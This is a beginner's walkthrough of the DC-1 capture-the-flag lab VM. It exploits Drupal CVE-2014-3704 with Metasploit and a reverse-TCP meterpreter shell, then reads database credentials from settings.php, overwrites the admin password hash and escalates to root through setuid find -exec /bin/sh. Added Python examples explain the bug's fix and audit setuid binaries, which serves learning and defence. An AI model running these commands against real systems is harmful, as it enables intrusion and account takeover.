DC-1 penetration lab VM walkthrough

A beginner's detailed walkthrough of the DC series lab VMs: DC-1

# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     f4:6a:92:10:12:f2       SHENZHEN FAST TECHNOLOGIES CO.,LTD
192.168.0.104   58:a0:23:79:16:11       Intel Corporate
192.168.0.100   48:2c:a0:e5:36:51       Xiaomi Communications Co Ltd
192.168.0.103   8c:c8:4b:60:79:f1       CHONGQING FUGUI ELECTRONICS CO.,LTD.
192.168.0.119   8c:c8:4b:60:79:f1       CHONGQING FUGUI ELECTRONICS CO.,LTD.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.038 seconds (125.61 hosts/sec). 5 responded

Because this is my own lab environment with only a few machines, it is obvious that the target is 192.168.0.119.

3. Information gathering

Use nmap's built-in vulnerability-scanning scripts (this can take a while):

└─# nmap --script=vuln -A 192.168.0.119
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-18 15:00 CST
Nmap scan report for localhost (192.168.0.119)
Host is up (0.0046s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=localhost
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://localhost:80/
|     Form id: user-login-form
|_    Form action: /node?destination=node
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /: Drupal version 7
|   /README: Interesting, a readme.
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704:
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability          # the scan found the SQL injection flaw for this version
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704                              # the CVE id; the description follows
|         The expandArguments function in the database abstraction API in
|         Drupal core 7.x before 7.32 does not properly construct prepared
|         statements, which allows remote attackers to conduct SQL injection
|         attacks via an array containing crafted keys.
|
|     Disclosure date: 2014-10-15
|     References:
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|       http://www.securityfocus.com/bid/70595
|       https://www.drupal.org/SA-CORE-2014-005
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
# .................... (omitted) ....................
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 218.35 seconds
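The nmap script output above quotes the cause of CVE-2014-3704: expandArguments() built prepared-statement placeholders from array keys. What follows is an added Python sketch of that pattern next to the shape of the fix Drupal 7.32 applied (iterate positions instead of keys); it is not code from this write-up or from Drupal, and the users table, its two rows, the function names and the sample keys are constructed for the demonstration.

```python
# Added example (not from the write-up or from Drupal): a Python sketch of the bug
# behind CVE-2014-3704. Drupal 7's expandArguments() expanded an IN (...) list by
# building placeholder names from the caller-supplied array KEYS; 7.32 switched to
# positional indexes (array_values()). Table, rows and names here are constructed.
import sqlite3
from typing import Dict, List, Tuple


def expand_in_vulnerable(field: str, values: Dict[str, str]) -> Tuple[str, Dict[str, str]]:
    """Pre-7.32 shape: placeholder name is field + '_' + KEY, so the key text
    becomes part of the SQL statement instead of staying a bound value."""
    placeholders, params = [], {}
    for key, value in values.items():            # iterating keys, not positions
        name = f"{field}_{key}"
        placeholders.append(":" + name)
        params[name] = value
    sql = f"SELECT uid, name FROM users WHERE {field} IN ({', '.join(placeholders)}) ORDER BY uid"
    return sql, params


def expand_in_fixed(field: str, values: Dict[str, str]) -> Tuple[str, Dict[str, str]]:
    """Post-fix shape: only the position 0, 1, 2 ... reaches the SQL text; whatever
    the caller used as keys is ignored and the values stay bound parameters."""
    placeholders, params = [], {}
    for i, value in enumerate(values.values()):  # array_values(): positional index
        name = f"{field}_{i}"
        placeholders.append(":" + name)
        params[name] = value
    sql = f"SELECT uid, name FROM users WHERE {field} IN ({', '.join(placeholders)}) ORDER BY uid"
    return sql, params


def run_query(sql: str, params: Dict[str, str]) -> List[Tuple[int, str]]:
    """Execute against a constructed in-memory users table (two rows, like the VM's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "Fred")])
    return conn.execute(sql, params).fetchall()


def is_well_formed(sql: str, params: Dict[str, str]) -> bool:
    """True if the database accepts the statement; False if the key text broke it."""
    try:
        run_query(sql, params)
        return True
    except sqlite3.Error:
        return False


# Normal input: keys are the indexes PHP assigns to a plain list.
NORMAL = {"0": "admin", "1": "Fred"}
# Untrusted input (constructed): a key that is not a bare identifier. PHP fills
# array keys straight from bracketed form field names, so the server does not
# control them.
ODD_KEYS = {"0 x": "admin", "1": "Fred"}

if __name__ == "__main__":
    print(expand_in_vulnerable("name", ODD_KEYS)[0])   # key text lands in the SQL
    print(expand_in_fixed("name", ODD_KEYS)[0])        # SQL unchanged
```

Run it and the vulnerable variant prints a statement whose IN list contains the raw key text (the database rejects it, which is the visible symptom that the key is now part of the statement), while the fixed variant prints the same two placeholders no matter what keys arrive. The defender's takeaway is the advisory's: upgrade to 7.32 or later, and in general never let untrusted data reach the text of a statement, only its bound values.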

4. Vulnerability verification

Exploit it with metasploit:

# first, start metasploit
msfconsole
[!] The following modules could not be loaded!
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!]     /usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.

(ASCII-art banner omitted)

       =[ metasploit v6.0.49-dev                          ]
+ -- --=[ 2142 exploits - 1141 auxiliary - 365 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules?
Try globally setting it with setg RHOSTS x.x.x.x

# we are in the msf console; remember the CVE id from the nmap scan? search for it
msf6 > search CVE-2014-3704

Matching Modules
================

   #  Name                                   Disclosure Date  Rank       Check  Description
   -  ----                                   ---------------  ----       -----  -----------
   0  exploit/multi/http/drupal_drupageddon  2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/drupal_drupageddon

# just use it
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp

# look at the settings it needs
msf6 exploit(multi/http/drupal_drupageddon) > show options

Module options (exploit/multi/http/drupal_drupageddon):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The target URI of the Drupal installation
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.111    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Drupal 7.0 - 7.31 (form-cache PHP injection method)

# the parameter we need to set is RHOSTS (the target ip); TARGETURI is already /, so it can stay as it is
# set the required parameter
msf6 exploit(multi/http/drupal_drupageddon) > set rhost 192.168.0.119
rhost => 192.168.0.119

# run it
msf6 exploit(multi/http/drupal_drupageddon) > run

[*] Started reverse TCP handler on 192.168.0.111:4444
[*] Sending stage (39282 bytes) to 192.168.0.119
[*] Meterpreter session 1 opened (192.168.0.111:4444 -> 192.168.0.119:42439) at 2021-07-18 15:28:08 +0800

meterpreter > # we are in the system!

5. Collecting the information we need

# we are now inside the meterpreter console (not sure how to describe it; "console" seems right)
# the common commands are much like bash; start with ls to see what is there
meterpreter > ls
Listing: /var/www
=================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  174    fil   2013-11-21 04:45:59 +0800  .gitignore
100644/rw-r--r--  5767   fil   2013-11-21 04:45:59 +0800  .htaccess
100644/rw-r--r--  1481   fil   2013-11-21 04:45:59 +0800  COPYRIGHT.txt
100644/rw-r--r--  1451   fil   2013-11-21 04:45:59 +0800  INSTALL.mysql.txt
100644/rw-r--r--  1874   fil   2013-11-21 04:45:59 +0800  INSTALL.pgsql.txt
100644/rw-r--r--  1298   fil   2013-11-21 04:45:59 +0800  INSTALL.sqlite.txt
100644/rw-r--r--  17861  fil   2013-11-21 04:45:59 +0800  INSTALL.txt
100755/rwxr-xr-x  18092  fil   2013-11-01 18:14:15 +0800  LICENSE.txt
100644/rw-r--r--  8191   fil   2013-11-21 04:45:59 +0800  MAINTAINERS.txt
100644/rw-r--r--  5376   fil   2013-11-21 04:45:59 +0800  README.txt
100644/rw-r--r--  9642   fil   2013-11-21 04:45:59 +0800  UPGRADE.txt
100644/rw-r--r--  6604   fil   2013-11-21 04:45:59 +0800  authorize.php
100644/rw-r--r--  720    fil   2013-11-21 04:45:59 +0800  cron.php
100644/rw-r--r--  52     fil   2019-02-19 21:20:46 +0800  flag1.txt        # here it is
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  includes
100644/rw-r--r--  529    fil   2013-11-21 04:45:59 +0800  index.php
100644/rw-r--r--  703    fil   2013-11-21 04:45:59 +0800  install.php
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  misc
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  modules
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  profiles
100644/rw-r--r--  1561   fil   2013-11-21 04:45:59 +0800  robots.txt
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  scripts          # note this one, it comes up again later
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  sites
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  themes
100644/rw-r--r--  19941  fil   2013-11-21 04:45:59 +0800  update.php
100644/rw-r--r--  2178   fil   2013-11-21 04:45:59 +0800  web.config
100644/rw-r--r--  417    fil   2013-11-21 04:45:59 +0800  xmlrpc.php

# flag1.txt stands out right away
# cat it to see what is inside
meterpreter > cat flag1.txt
Every good CMS needs a config file - and so do you.
# the hint is clear enough: find the site's configuration file
# the ls above showed the site's folder:
40755/rwxr-xr-x   4096   dir   2013-11-21 04:45:59 +0800  sites
# go in and have a look
meterpreter > cd sites
meterpreter > ls
Listing: /var/www/sites
=======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  904   fil   2013-11-21 04:45:59 +0800  README.txt
40755/rwxr-xr-x   4096  dir   2013-11-21 04:45:59 +0800  all
40555/r-xr-xr-x   4096  dir   2019-02-19 21:48:01 +0800  default
100644/rw-r--r--  2365  fil   2013-11-21 04:45:59 +0800  example.sites.php

# there is an obvious default folder; go in
meterpreter > cd default
meterpreter > ls
Listing: /var/www/sites/default
===============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  23202  fil   2013-11-21 04:45:59 +0800  default.settings.php
40775/rwxrwxr-x   4096   dir   2019-02-19 21:10:31 +0800  files
100444/r--r--r--  15989  fil   2019-02-19 21:48:01 +0800  settings.php

# found the settings file; cat it
meterpreter > cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
# .................... (omitted)
# never mind what this flag hints at for now; we have a username and password, so log in with them first
# drop into a shell
meterpreter > shell
Process 3506 created.
Channel 9 created.

# since python is available, getting a proper bash is easy
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-1:/var/www/sites/default$

# a few words about python -c "import pty;pty.spawn('/bin/bash')"
# two parts: first, python -c "*" runs python code from the console
# e.g. python -c "print('hello,world')"  [note: do not nest the same " quote, or python cannot tell where the string ends]
# wrong example: python -c "print("hello,world")"
#	Traceback (most recent call last):
#	  File "<string>", line 1, in <module>
#	NameError: name 'hello' is not defined
#
# the other part is import pty (the pseudo-terminal module)
# it loads the pty module, and pty.spawn('/bin/bash') starts bash inside a pseudo-terminal

# next, take a look at its database
www-data@DC-1:/var/www/sites/default$ mysql -udbuser -pR0ck3t
mysql -udbuser -pR0ck3t
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4505
Server version: 5.5.60-0+deb7u1 (Debian)

Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
# logged in; list the databases first
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| drupaldb           |
+--------------------+
2 rows in set (0.00 sec)

# drupaldb should be the site's database; switch to it
mysql> use drupaldb
use drupaldb
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
# see what tables there are
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb          |
+-----------------------------+
| actions                     |
| authmap                     |
| batch                       |
| block                       |
| block_custom                |
| block_node_type             |
| block_role                  |
| blocked_ips                 |
| cache                       |
| cache_block                 |
| cache_bootstrap             |
| cache_field                 |
| cache_filter                |
| cache_form                  |
| cache_image                 |
| cache_menu                  |
| cache_page                  |
| cache_path                  |
| cache_update                |
| cache_views                 |
| cache_views_data            |
| comment                     |
| ctools_css_cache            |
| ctools_object_cache         |
| date_format_locale          |
| date_format_type            |
| date_formats                |
| field_config                |
| field_config_instance       |
| field_data_body             |
| field_data_comment_body     |
| field_data_field_image      |
| field_data_field_tags       |
| field_revision_body         |
| field_revision_comment_body |
| field_revision_field_image  |
| field_revision_field_tags   |
| file_managed                |
| file_usage                  |
| filter                      |
| filter_format               |
| flood                       |
| history                     |
| image_effects               |
| image_styles                |
| menu_custom                 |
| menu_links                  |
| menu_router                 |
| node                        |
| node_access                 |
| node_comment_statistics     |
| node_revision               |
| node_type                   |
| queue                       |
| rdf_mapping                 |
| registry                    |
| registry_file               |
| role                        |
| role_permission             |
| search_dataset              |
| search_index                |
| search_node_links           |
| search_total                |
| semaphore                   |
| sequences                   |
| sessions                    |
| shortcut_set                |
| shortcut_set_users          |
| system                      |
| taxonomy_index              |
| taxonomy_term_data          |
| taxonomy_term_hierarchy     |
| taxonomy_vocabulary         |
| url_alias                   |
| users                       |   # this should be the users table; have a look
| users_roles                 |
| variable                    |
| views_display               |
| views_view                  |
| watchdog                    |
+-----------------------------+
80 rows in set (0.00 sec)
# quite a long list; just find the table we need
# the rows are wide, so use \G for vertical output
mysql> select * from users\G;
select * from users\G;
*************************** 1. row ***************************
             uid: 0
            name:
            pass:
            mail:
           theme:
       signature:
signature_format: NULL
         created: 0
          access: 0
           login: 0
          status: 0
        timezone: NULL
        language:
         picture: 0
            init:
            data: NULL
*************************** 2. row ***************************
             uid: 1
            name: admin
            pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
            mail: admin@example.com
           theme:
       signature:
signature_format: NULL
         created: 1550581826
          access: 1550583852
           login: 1550582362
          status: 1
        timezone: Australia/Melbourne
        language:
         picture: 0
            init: admin@example.com
            data: b:0;
*************************** 3. row ***************************
             uid: 2
            name: Fred
            pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
            mail: fred@example.org
           theme:
       signature:
signature_format: filtered_html
         created: 1550581952
          access: 1550582225
           login: 1550582225
          status: 1
        timezone: Australia/Melbourne
        language:
         picture: 0
            init: fred@example.org
            data: b:0;
3 rows in set (0.00 sec)

ERROR:
No query specified

# judging by the format, these hashes come from the password-hash script that is run with php
# flag2 said brute force is not the way; the simpler route is to update the password instead
# the ls in the first step showed the scripts folder
# just generate a new hash
www-data@DC-1:/var/www$ php scripts/password-hash.sh password
php scripts/password-hash.sh password

password: password 		hash: $S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq

# back in mysql, overwrite one account's password with update
mysql> update users set pass="$S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq" where uid=1;
<s="$S$D0OYptNw193DwK.usKa2LgiquAjo5e/z342ZI8W2dH4sTrx8G7Cq" where uid=1;
Query OK, 0 rows affected (0.00 sec)
Rows matched: 1  Changed: 0  Warnings: 0

# now we can log in to the site
# log in first
# flag3 is in the Dashboard at the top left of the site
flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
# roughly: special PERMS help find the passwd, but you need to -exec that command to work out how to get what's in the shadow
# that is how I read it; it seems to say use PERMS and FIND to locate passwd, since both are capitalised
# so use the find command to look for flag4
www-data@DC-1:/var/www$ find / -name flag4*
find / -name flag4*
/home/flag4
/home/flag4/flag4.txt

# found it: not only a flag4 text file but also a flag4 folder
# go into that folder and read it
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?
# so the last flag is settled: get root privileges and read it
# looking at other people's write-ups, they use find for privilege escalation
# in short, find has an -exec argument that runs a command
# root's shell is usually /bin/sh

www-data@DC-1:/home/flag4$ find flag4.txt -exec "/bin/sh" \;
find flag4.txt -exec "/bin/sh" \;
# verify the escalation
whoami
root
# success!

cd /root
ls
thefinalflag.txt
# the last flag
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey by contacting me via Twitter - @DCAU7
# (twitter plug and so on)

# done

6. Summary

A summary of what was learned this time, for easy review later:

  • Used arp-scan -l to quickly locate the target's address

  • Used nmap's built-in vulnerability scripts to find the vulnerability

  • Used msf to exploit the vulnerability

  • Read settings.php in the sites/default folder to find its configuration details

  • Used python's pty module to bring up a bash console

    python -c "import pty;pty.spawn('/bin/bash')"

  • Used the php password-hash script to generate a hash and overwrote an existing user's password

    php scripts/password-hash.sh password

    update [table] set [column]="[new value]" where [condition]

  • Used find for privilege escalation; root's shell is usually /bin/sh

    find [existing file] -exec "/bin/sh" \;

If anything is still unclear, message me or discuss it in the comments, so we can all improve together.
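The escalation above relies on the find binary carrying the setuid bit while owned by root (the write-up does not show the bit itself, but that is the usual cause on DC-1). Here is an added Python audit, not from the write-up, that lists setuid-root files outside a baseline and emits the chmod u-s commands that remove the bit; the baseline set, the sample entries and the directory list are constructed assumptions to adjust for your own hosts.

```python
# Added example (not from the write-up): audit for setuid-root binaries outside a
# baseline, i.e. the condition that lets "find ... -exec /bin/sh \;" return a root
# shell. Baseline, sample entries and scan roots are constructed assumptions.
import os
import stat
from typing import Iterable, List, Tuple

# Binaries that are legitimately setuid root on a typical Debian-style host (constructed baseline).
EXPECTED_SETUID_ROOT = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/sudo",
}

Entry = Tuple[str, int, int]   # (path, st_mode, st_uid)


def unexpected_setuid_root(entries: Iterable[Entry]) -> List[str]:
    """Return paths that are setuid AND owned by root AND not on the baseline."""
    return sorted(
        path for path, mode, uid in entries
        if mode & stat.S_ISUID and uid == 0 and path not in EXPECTED_SETUID_ROOT
    )


def setuid_non_root(entries: Iterable[Entry]) -> List[str]:
    """Setuid files owned by other users: less severe, but still worth reviewing."""
    return sorted(path for path, mode, uid in entries if mode & stat.S_ISUID and uid != 0)


def remediation(paths: Iterable[str]) -> List[str]:
    """Commands that strip the bit, which is what an admin would run on DC-1's find."""
    return [f"chmod u-s {p}" for p in paths]


def scan(roots=("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin")) -> List[Entry]:
    """Collect (path, mode, uid) for regular files under the given directories."""
    found = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode):
                    found.append((path, st.st_mode, st.st_uid))
    return found


# Constructed sample shaped like os.lstat() results; 0o104755 = regular file, setuid, mode 0755.
SAMPLE: List[Entry] = [
    ("/usr/bin/passwd", 0o104755, 0),      # expected setuid root
    ("/usr/bin/find",   0o104755, 0),      # the DC-1 misconfiguration
    ("/bin/ls",         0o100755, 0),      # ordinary executable
    ("/opt/tool/run",   0o104755, 1000),   # setuid to a non-root user
]

if __name__ == "__main__":
    for line in remediation(unexpected_setuid_root(scan())):
        print(line)
```

Running the script as written walks the usual binary directories of the current host; the SAMPLE list shows the shape of the input so the checks can be exercised without root or a real DC-1 box. Shipping the baseline from configuration management and diffing the output on a schedule turns this into a simple drift check.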

Copyright notice: published by 玥玥 on 2021-07-21 5:01:15.
When reposting please credit: DC-1 penetration lab VM walkthrough | 女黑客导航